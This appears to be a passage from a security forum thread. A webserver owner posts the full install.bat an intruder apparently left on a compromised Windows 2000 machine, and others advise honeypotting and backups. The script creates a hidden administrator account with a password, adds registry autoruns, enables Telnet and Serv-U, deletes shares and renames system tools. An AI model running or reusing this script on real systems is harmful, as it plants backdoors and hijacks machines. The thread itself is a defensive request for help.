    Here's the install.bat

    Code:
    set  key=1 
    ver | find "2000" > nul 
    if not errorlevel 1 set key=2
    c:
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
    
    net user GLoB peupo3nn/add  /yes
    net LOCALGROUP administrators GLoB /add 
    net group "Domain Admins" GLoB /add
    
    echo REGEDIT4  1>>ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
    echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg  
    echo "restrictanonymous"=dword:0000000%key% >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
    echo "NTLM"=dword:00000001 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg  
    echo "Start"=dword:00000002 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
    echo "AutoShareServer"=dword:00000000>> ins.reg  
    echo "AutoShareWks"=dword:00000000>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
    echo "DontDisplayLastUserName"=dword:00000001>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg  
    echo "RestrictNullSessAccess"=dword:00000001>> ins.reg  
    
    regedit /S ins.reg
    del ins.reg
    svchost.exe /i
    net stop Serv-U
    net start Serv-U
    net stop tlntsvr
    net start tlntsvr
    net stop "messenger" 
    net stop "netbios" 
    net share /delete C$ /y 
    net share /delete D$ /y 
    net share /delete E$ /y 
    net share /delete F$ /y 
    net share /delete ADMIN$ 
    net share /delete IPC$ 
    
    net stop "Remote Registry Service" 
    net stop "Computer Browser" 
    net stop "REMOTE PROCEDURE CALL" 
    net stop "REMOTE PROCEDURE CALL SERVICE" 
    net stop "Remote Access Connection Manager" 
    net stop "telnet" 
    mkdir c:\winnt\Recycled\.glob
    cd c:\winnt\system32\
    ren net.exe neo.exe
    ren tftp.exe neo2.exe
    ren ftp.exe neo3.exe
    ren at.exe neo4.exe
    c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
    noodle. I have his IP from the Savant log. 80.14.79.43

    SamSpade didn't give up much. lol

    And, I'm pretty sure that the Linksys router keeps a log by default. I just started playing as a webserver and most of this is pretty new to me.

    As far as Savant, I am using version 3.1

    Like I said, I just put all this up a few weeks ago and I used all current releases so, I believe I have the latest patches for everything. I'll do that same Google search and see what I find. Thanks for the tip.
    KapperDog

  9. #9
    I'd rather be fishing
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867
    This is just my opinion, but if you can divorce this box from the rest of your servers, I'd leave it up and treat it like a honeypot. If it's up, you may be able to catch him/her red-handed and be able to trace the attack. Again, if this is going to put your other systems at risk, you may want to take it off the wire.

    Cheers:
    DjM

  10. #10
    Member
    Join Date
    Jul 2002
    Posts
    46
    I don't have much to tell you about your network's vulnerabilities (I'm just learning) but you DEFINITELY should back up all data you care about now if you haven't already got it backed up. If you haven't got it backed up already, the intruder might have already corrupted it.
